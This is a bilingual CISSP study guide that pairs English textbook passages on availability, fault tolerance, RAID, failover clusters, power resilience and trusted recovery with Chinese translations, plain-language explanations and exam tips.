It may be necessary to emphasize the potential loss and exposure that comes with losing such data to wrongdoers, competitors, or other unauthorized third parties. It may suffice to point out to Bethany that the employee handbook clearly states that employees whose behavior leads to the unauthorized disclosure or loss of information assets are subject to loss of pay or termination. If such behavior recurs after a warning, Bethany should be rebuked and reassigned to a position where she can't expose sensitive or proprietary information—that is, if she's not fired on the spot.

中文直译 / 整理

远程安全挑战 盗窃和破坏的持续威胁是全球信息安全专业人员的噩梦。 个人身份信息、 专有信息或商业秘密以及其他形式的机密数据,对创建和拥有它们的人来 说,与对直接竞争对手和其他未经授权的第三方一样重要。 以下是一个示 例。 亚伦作为一名知名且高度可见的计算企业的安全官员,亲身经历了机密数 据面临的威胁。 他的主要职责是防止敏感信息暴露于各种因素和实体。 贝 瑟尼是他最麻烦的员工之一,因为她总是未经妥善保护内容就将笔记本电 脑带离现场。 即使是一次随意的砸窗盗窃行为,也可能导致成千上万的客户联系信息及其 机密商业往来面临泄露甚至被出售给恶意方的风险。 亚伦深知潜在的危险, 但贝瑟尼似乎根本不关心。 这提出了一个问题:如何更好地向贝瑟尼提供信息、培训或建议,以便在她 的笔记本电脑被盗时,亚伦无需解除她的职务? 贝瑟尼必须理解并认识到保 护敏感信息的重要性。 可能有必要强调,此类数据一旦落入不法分子、竞争 对手或其他未经授权的第三方手中,可能带来的损失和暴露风险。 或许只需 向贝瑟尼指出,员工手册中明确说明,因行为导致信息资产被未经授权披露 或丢失的员工,将面临扣薪或解雇的后果。

如果在警告后此类行为再次发生, 贝瑟尼应受到训斥并调至无法接触敏感或专有信息的岗位——当然,如果情 节严重,也可立即解雇。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1233 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 18 / PDF P1234

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Keep in mind the impact that theft may have on your operations when planning your parts inventory. It's a good idea to keep extra inventory of items with a high pilferage rate, such as RAM chips and mobile devices. It's also a good idea to keep such materials in secure storage and to require employees to sign such items out whenever they are used. Understand System Resilience, High Availability, and Fault Tolerance Technical controls that add to system resilience and fault tolerance directly affect availability, one of the core goals of the CIA Triad (confidentiality, integrity, and availability).

A primary goal of system resilience and fault tolerance is to eliminate single points of failure in critical business systems. A single point of failure (SPOF) is any component that can cause an entire system to fail. If a computer has data on a single disk, failure of the disk can cause the computer to fail, so the disk is a single point of failure. If a database-dependent website includes multiple web servers all served by a single database server, the database server is a single point of failure. System resilience refers to the ability of a system to maintain an acceptable level of service during an adverse event.

This could be a hardware fault managed by fault-tolerant components, or it could be an attack managed by other controls such as effective intrusion prevention systems. In some contexts, it refers to the ability of a system to return to a previous state after an adverse event. For example, if a primary server in a failover cluster fails, fault tolerance ensures that the system fails over to another server. System resilience implies that the cluster can fail back to the original server after the original server is repaired. Fault tolerance is the ability of a system to suffer a fault but continue to operate.

Fault tolerance is achieved by adding redundant components, such as additional disks within a properly configured RAID array or additional servers within a failover clustered configuration. High availability is the use of redundant technology components to allow a system to quickly recover from a failure after experiencing a brief disruption.

中文直译 / 整理

在规划零部件库存时,请务必考虑盗窃对运营可能造成的影响。 对于盗 窃率较高的物品,如内存芯片和移动设备,保留额外库存是个好主意。 同时, 也建议将此类物资存放在安全地点,并要求员工在使用时签字领取。 理解系统弹性、高可用性和容错性 增强系统弹性和容错性的技术控制措施直接影响可用性,而可用性是CIA三 元组(机密性、完整性和可用性)的核心目标之一。 系统弹性和容错性的主 要目标是消除关键业务系统中的单点故障。 单点故障(SPOF)是指任何可能导致整个系统失效的组件。 如果一台计算机的数 据仅存储在单个磁盘上,那么该磁盘的故障将导致计算机失效,因此该磁盘就是 一个单点故障。 如果一个依赖数据库的网站由多个Web服务器提供服务,但这些 服务器都由单一的数据库服务器支持,那么该数据库服务器就是一个单点故障。 系统弹性是指系统在遭遇不利事件时仍能维持可接受服务水平的能力。 这可能 是由容错组件管理的硬件故障,也可能是由其他控制措施(如有效的入侵防御 系统)管理的攻击。 在某些语境中,它指系统在遭遇不利事件后恢复到先前状 态的能力。 例如,如果故障转移集群中的主服务器发生故障,容错机制将确保 系统切换到另一台服务器。

系统弹性意味着在原始服务器修复后,集群能够切 换回原始服务器。 容错是指系统在发生故障时仍能继续运行的能力。 通过添加冗余组件(例如在 正确配置的RAID阵列中增加磁盘,或在故障转移集群配置中增加服务器)来实 现容错。 高可用性是通过使用冗余技术组件,使系统在经历短暂中断后能够快速从故障中恢 复。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 19 / PDF P1235

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

High availability is often achieved through the use of load balancing and failover servers. Technology professionals measure the objective and effectiveness of these controls by the percentage of the time that a system is available. For example, a fairly low availability threshold would be to specify that a system must be available 99.9 percent of the time (or “three nines” of availability). This means that the system may only experience 0.1 percent of downtime during whatever period is measured. If you apply this metric to a 30-day month of system operation, 99.9 percent availability would require less than 44 minutes of downtime.

If you move to a 99.999 percent (or “five nines”) requirement, the system would only be permitted 26 seconds of downtime per month. Of course, the stronger your availability requirement, the more difficult it will be to meet. Achieving higher availability targets on a consistent basis requires the use of high availability, fault tolerance, and system resilience controls. Protecting Hard Drives A common way that fault tolerance and system resilience is added for computers is with a RAID array. A RAID array includes two or more disks, and most RAID configurations will continue to operate even after one of the disks fails.

Some of the common RAID configurations are as follows: RAID-0 This is also called striping. It uses two or more disks and improves the disk subsystem performance, but it does not provide fault tolerance. RAID-1 This is also called mirroring. It uses two disks, which both hold the same data. If one disk fails, the other disk includes the data so that a system can continue to operate after a single disk fails. Depending on the hardware used and which drive fails, the system may be able to continue to operate without intervention, or the system may need to be manually configured to use the drive that didn't fail. RAID-5 This is also called striping with parity.

It uses three or more disks with the equivalent of one disk holding parity information. This parity information is distributed and allows the reconstruction of data through mathematical calculations if a single disk is lost. If any single disk fails, the RAID array will continue to operate, though it will be slower. RAID-6 This offers an alternative approach to disk striping with parity. It functions in the same manner as RAID-5 but with dual distributed parity

中文直译 / 整理

高可用性通常通过使用负载均衡和故障转移服务器来实现。 技术专业人员通过系统可用时间的百分比来衡量这些控制措施的客观性和有效 性。 例如,一个相对较低的可用性阈值是规定系统必须99.9%的时间保持可用 (即“三个九”可用性)。 这意味着在所测量的任何时间段内,系统停机时间 不得超过0.1%。 如果将此指标应用于30天的系统运行周期,99.9%的可用性要 求停机时间少于44分钟。 如果提升至99.999%(即“五个九”)的要求,系统 每月允许的停机时间仅为26秒。 当然,可用性要求越高,实现起来就越困难。 要持续达到更高的可用性目标, 必须采用高可用性、容错和系统弹性控制措施。 保护硬盘 为计算机增加容错和系统弹性的常见方法是使用RAID阵列。 RAID阵列包含 两个或更多磁盘,大多数RAID配置在其中一个磁盘发生故障时仍能继续运行。 一些常见的RAID配置如下: RAID-0 这也称为 条带化。 它使用两个或更多磁盘,并提升 磁盘子系统的性能,但不提供容错能力。 RAID-1 这也称为 镜像。 它使用两个磁盘,两者保存相同的数据。 如果一个 磁盘损坏,另一个磁盘包含数据,因此系统在单个磁盘故障后仍可继续运行。

根据所使用的硬件和哪个驱动器故障,系统可能能够在无需人工干预的情况 下继续运行,或者可能需要手动配置以使用未故障的驱动器。 RAID-5 这也称为 带奇偶校验的条带化。 它使用三个或更多磁盘,其中相当于 一个磁盘的空间用于存储奇偶校验信息。 这些奇偶校验信息被分布存储,当丢 失单个磁盘时,可通过数学计算重建数据。 如果任何单个磁盘故障,RAID 阵列 仍可继续运行,但速度会变慢。 RAID-6 这提供了一种不同于带奇偶校验的磁盘条带化的替代方法。 它的工作方式 与RAID‑5相同,但具有双分布式奇偶校验

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 20 / PDF P1236

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

stored on the equivalent of two disks, protecting against the failure of two separate disks but requiring a minimum of four disks to implement. RAID-10 This is also known as RAID 1 + 0 or a stripe of mirrors, and it is configured as two or more mirrors (RAID-1), with each mirror configured in a striped (RAID-0) configuration. It uses at least four disks but can support more as long as an even number of disks are added. It will continue to operate even if multiple disks fail, as long as at least one drive in each mirror continues to function. For example, if it had three mirrored sets (called M1, M2, and M3 for this example) it would have a total of six disks.

If one drive in M1, one in M2, and one in M3 all failed, the array would continue to operate. However, if two drives in any of the mirrors failed, such as both drives in M1, the entire array would fail. Fault tolerance is not the same as a backup. Occasionally, management may balk at the cost of backup tapes and point to the RAID array, saying that the data is already backed up. However, if a catastrophic hardware failure destroys a RAID array, all the data is lost unless a backup exists. Similarly, if an accidental deletion or corruption destroys data, it cannot be restored if a backup doesn't exist. Both softwareand hardware-based RAID solutions are available.

Softwarebased systems require the operating system to manage the disks in the array and can reduce overall system performance. They are relatively inexpensive, since they don't require any additional hardware other than the additional disk(s). Hardware RAID systems are generally more efficient and reliable. Although a hardware RAID is more expensive, the benefits outweigh the costs when used to increase availability of a critical component. Hardware-based RAID arrays typically include spare drives that can be logically added to the array. For example, a hardware-based RAID-5 could include five disks, with three disks in a RAID-5 array and two spare disks.

If one disk fails, the hardware senses the failure and logically swaps out the faulty drive with a good spare. Additionally, most hardware-based arrays support hot swapping, allowing technicians to replace failed disks without powering down the system. A cold-swappable RAID requires the system to be powered down to replace a faulty drive.

中文直译 / 整理

存储在相当于两块磁盘的空间上,可防范两块独立磁盘的故障,但实现时至少 需要四块磁盘。 RAID-10 这也被称为 RAID 1 + 0 或 镜像条带,它被配置为两个或更多镜像( RAID‑1),每个镜像均采用条带化(RAID‑0)配置。 它至少需要四块磁盘,但 只要添加偶数块磁盘,就可以支持更多磁盘。 即使多个磁盘发生故障,只要每个 镜像中至少有一个驱动器正常工作,阵列仍能继续运行。 例如,如果它有三个镜 像集(本例中称为 M1、M2 和 M3),则总共会有六块磁盘。 如果 M1 中一块、 M2 中一块、M3 中一块磁盘全部损坏,阵列仍能继续运行。 然而,如果任何一 个镜像中的两块磁盘都损坏,例如 M1 中的两块磁盘都损坏,整个阵列就会失效。 容错并不等同于备份。 有时,管理层可能会对备份磁带的成本感到犹 豫,并指向 RAID 阵列,声称数据已经备份。 然而,如果灾难性硬件故障 导致 RAID 阵列损坏,除非存在备份,否则所有数据都将丢失。 同样,如 果意外删除或数据损坏导致数据丢失,而没有备份,则无法恢复。 可用基于软件和硬件的RAID解决方案。 基于软件的系统需要操作系统来管理阵 列中的磁盘,可能会降低整体系统性能。

由于不需要除额外磁盘以外的任何其 他硬件,因此相对便宜。 硬件RAID系统通常更高效、更可靠。 尽管硬件 RAID成本更高,但在用于提高关键组件的可用性时,其优势大于成本。 基于硬件的RAID阵列通常包含可以逻辑添加到阵列中的备用驱动器。 例如, 一个基于硬件的RAID‑5阵列可能包含五个磁盘,其中三个磁盘组成RAID‑5阵 列,另外两个为备用磁盘。 如果一个磁盘发生故障,硬件会检测到该故障,并 逻辑地将故障驱动器替换为一个正常的备用驱动器。 此外,大多数基于硬件的 阵列都支持热插拔,允许技术人员在不关闭系统的情况下更换故障磁盘。 冷插 拔RAID则要求在更换故障驱动器前必须关闭系统。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 21 / PDF P1237

第 1237 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Protecting Servers Fault tolerance can be added for critical servers with failover clusters. A failover cluster includes two or more servers, and if one of the servers fails, another server in the cluster can take over its load in an automatic process called failover. Failover clusters can include multiple servers (not just two), and they can also provide fault tolerance for multiple services or applications. As an example of a failover cluster, consider Figure 18.3. It shows multiple components put together to provide reliable web access for a heavily accessed website that uses a database. DB1 and DB2 are two database servers configured in a failover cluster.

At any given time, only one server will function as the active database server, and the second server will be inactive. For example, if DB1 is the active server it will perform all the database services for the website. DB2 monitors DB1 to ensure it is operational, and if DB2 senses a failure in DB1, it will cause the cluster to automatically fail over to DB2. In Figure 18.3, you can see that both DB1 and DB2 have access to the data in the database. This data is stored on a RAID array, providing fault tolerance for the disks. Additionally, the three web servers are configured in a network loadbalancing cluster.

The load balancer can be hardwareor software-based, and it balances the client load across the three servers. It makes it easy to add additional web servers to handle increased load while also balancing the load among all the servers. If any of the servers fail, the load balancer can sense the failure and stop sending traffic to that server. Although network load balancing is primarily used to increase the scalability of a system so that it can handle more traffic, it also provides a measure of fault tolerance.

中文直译 / 整理

保护服务器 对于关键服务器,可以通过故障转移集群添加容错功能。 故障转移集群包含两 台或更多服务器,当其中一台服务器发生故障时,集群中的另一台服务器可以 通过一种称为故障转移的自动过程接管其负载。 故障转移集群可以包含多台服 务器(不止两台),并且还可以为多个服务或应用程序提供容错功能。 作为故障转移集群的一个示例,请参见图 18.3。 该图展示了多个组件如何组合 在一起,为使用数据库的高访问量网站提供可靠的网页访问服务。 DB1 和 DB2 是两个配置为故障转移集群的数据库服务器。 在任何给定时间,只有一个 服务器将作为活动数据库服务器运行,而第二个服务器则处于非活动状态。 例 如,如果 DB1 是活动服务器,它将为网站执行所有数据库服务。 DB2 会监控 DB1 以确保其正常运行,如果 DB2 检测到 DB1 故障,它将触发集群自动故障 切换至 DB2。 在图 18.3中,您可以了解到 DB1 和 DB2 都能访问数据库中的数据。 这些数据 存储在 RAID 阵列上,为磁盘提供了容错能力。 此外,这三台Web服务器配置在一个网络负载均衡集群中。 负载均衡器可以是 硬件或软件形式,它将客户端负载均衡分配到这三台服务器上。

这使得在需要 处理更大负载时,可以轻松添加额外的Web服务器,同时在所有服务器之间均 衡负载。 如果任何一台服务器发生故障,负载均衡器能够检测到故障并停止向 该服务器发送流量。 尽管网络负载均衡主要用于提高系统的可扩展性,以处理 更多流量,但它也提供了某种程度的容错能力。

小白解释

场景先行:你是公司的安全负责人,正在读第 1237 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1237 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 22 / PDF P1238

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

FIGURE 18.3 Failover cluster with network load balancing If you're running your servers in the cloud, you may be able to take advantage of fault tolerance services offered by your cloud provider. For example, many IaaS providers offer load-balancing services that automatically scale resources on an as-needed basis. These services also incorporate health checking that can automatically restart servers that are not functioning properly. Similarly, when designing cloud environments, be sure to consider the availability of data centers in different regions of the world.

If you are already load-balancing multiple servers, you may be able to place those servers in different geographic regions and availability zones within those regions to add resiliency in addition to scalability.

中文直译 / 整理

图 18.3带网络负载均衡的故障转移集群 如果您的服务器运行在云中,您可能能够利用云服务提供商提供的容错服务。 例如,许多IaaS提供商提供负载均衡服务,可根据需要自动扩展资源。 这些服 务还集成了健康检查功能,能够自动重启运行异常的服务器。 同样,在设计云环境时,请务必考虑全球不同地区数据中心的可用性。 如果您 已经对多台服务器进行负载均衡,可以将这些服务器部署在不同的地理区域及 其内的可用区中,以在可扩展性之外增加弹性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 23 / PDF P1239

第 1239 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Failover clusters are not the only method of fault tolerance for servers. Some systems provide automatic fault tolerance for servers, allowing a server to fail without losing access to the provided service. For example, in a Microsoft domain with two or more domain controllers, each domain controller will regularly replicate Active Directory data with the others so that all the domain controllers have the same data. If one fails, computers within the domain can still find the other domain controller(s) and the network can continue to operate. Similarly, many database server products include methods to replicate database content with other servers so that all servers have the same content.

Three of these methods—electronic vaulting, remote journaling, and remote mirroring—are discussed later in this chapter. Protecting Power Sources Fault tolerance can be added for power sources with a UPS, a generator, or both. In general, a UPS provides battery-supplied power for a short period of time, between 5 and 30 minutes, and a generator provides long-term power. The goal of a UPS is to provide power long enough to complete a logical shutdown of a system, or until a generator is powered on and providing stable power. Generators provide power to systems during long-term power outages.

The length of time that a generator will provide power is dependent on the fuel, and it's possible for a site to stay on generator power as long as it has fuel and the generator remains functional. Generators also require a steady fuel supply—they commonly use diesel fuel, natural gas, or propane. In addition to making sure that you have sufficient fuel on hand, you should take steps to ensure that you can be delivered fuel on a regular basis in the event of an extended emergency. Remember, if the disaster is widespread, there will be significant demand for a limited fuel supply. If you have contracts in place with suppliers, you're much more likely to receive fuel in a timely manner.

A more detailed discussion of power issues appeared in Chapter 10. Trusted Recovery

中文直译 / 整理

故障转移集群并非服务器容错的唯一方法。 一些系统为服务器提供了自 动容错功能,允许服务器发生故障时仍能访问所提供的服务。 例如,在包含 两个或更多域控制器的 Microsoft 域中,每个域控制器都会定期与其他域控 制器复制 Active Directory 数据,以确保所有域控制器拥有相同的数据。 如果其中一个发生故障,域内的计算机仍可找到其他域控制器,网络可以继 续运行。 类似地,许多数据库服务器产品都包含将数据库内容复制到其他服 务器的方法,以确保所有服务器拥有相同的内容。 本章后续将讨论其中三种 方法:电子归档、远程日志记录和远程镜像。 保护电源 可以通过使用UPS、发电机或两者兼用来为电源增加容错能力。 通常,UPS在 短时间内提供电池供电,时间为5至30分钟,而发电机则提供长期供电。 UPS 的目标是提供足够长的电力,以完成系统的逻辑关机,或直至发电机启动并提 供稳定电力。 发电机在长时间停电期间为系统供电。 发电机供电的时间长度取决于燃料,只 要站点拥有燃料且发电机保持正常运行,就可以持续使用发电机供电。 发电机 还需要稳定的燃料供应——通常使用柴油、天然气或丙烷。

除了确保有足够的 燃料储备外,您还应采取措施,确保在发生长期紧急情况时能够定期获得燃料 供应。 请记住,如果灾害影响范围广泛,对有限燃料供应的需求将大幅增加。 如果您已与供应商签订合同,您将更有可能及时获得燃料。 有关电源问题的更详细讨论见第10章。 可信恢复

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1239 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 24 / PDF P1240

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Trusted recovery provides assurances that after a failure or crash, the system is just as secure as it was before the failure or crash occurred. Depending on the failure, the recovery may be automated or require manual intervention by an administrator. However, in either case systems can be designed to ensure that they support trusted recovery. Systems can be designed so that they fail in a fail-secure state or a fail-open state. A fail-secure system will default to a secure state in the event of a failure, blocking all access, and therefore, allowing the system to fail securely. A fail-open system will fail in an open state, granting all access.

The choice is dependent on whether security or availability is more important after a failure. A complete discussion of these topics appeared in Chapter 8, “Principles of Security Models, Design, and Capabilities.” Two elements of the recovery process are addressed to implement a trusted solution. The first element is failure preparation. This includes system resilience and fault-tolerant methods in addition to a reliable backup solution. The second element is the process of system recovery. The system should be forced to reboot into a single-user, nonprivileged state.

This means that the system should reboot so that a normal user account can be used to log in and so that the system does not grant unauthorized access to users. System recovery also includes the restoration of all affected files and services actively in use on the system at the time of the failure or crash. Any missing or damaged files are restored, any changes to classification labels are corrected, and settings on all security critical files are then verified. The Common Criteria include a section on trusted recovery that is relevant to system resilience and fault tolerance.

Specifically, it defines four types of trusted recovery: Manual Recovery If a system fails, it does not fail in a secure state. Instead, an administrator is required to manually perform the actions necessary to implement a secured or trusted recovery after a failure or system crash. Automated Recovery The system is able to perform trusted recovery activities to restore itself against at least one type of failure. For example, a hardware RAID provides automated recovery against the failure of a hard drive but not against the failure of the entire server. Some types of failures will require manual recovery.

Automated Recovery without Undue Loss This is similar to automated recovery in that a system can restore itself against at least one

中文直译 / 整理

